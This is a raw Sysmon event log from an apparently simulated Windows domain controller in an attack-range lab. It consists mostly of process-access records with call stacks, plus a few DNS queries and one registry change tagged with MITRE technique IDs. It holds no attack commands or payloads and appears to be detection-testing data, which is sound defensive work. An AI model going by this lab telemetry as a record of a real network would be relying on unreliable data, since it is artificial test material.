13:58:16.024{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.946{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 22542200x800000000000000010252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.335{59A5CD1D-8E46-6005-1600-00000000A301}1544fe2.update.microsoft.com0type: 5 fe2.update.microsoft.com.nsatc.net;::ffff:20.188.78.189;::ffff:40.70.224.149;::ffff:52.142.21.139;C:\Windows\System32\svchost.exe 22542200x800000000000000010251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.778{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.comodoca.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 13241300x800000000000000010250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.836{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000003) 10341000x800000000000000010249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+3a1a|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.664{59A5CD1D-8E46-6005-1600-00000000A301}15442408C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\sessenv.dll+3de88|c:\windows\system32\sessenv.dll+f881|c:\windows\system32\sessenv.dll+677c|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.649{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.649{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F804-00000000A301}2740C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F804-00000000A301}2740C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.571{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F804-00000000A301}2740C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+10806|c:\windows\system32\UBPM.dll+d3a9|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.539{59A5CD1D-93F9-6005-F704-00000000A301}22564880C:\Windows\system32\conhost.exe{59A5CD1D-93F9-6005-F404-00000000A301}2964C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
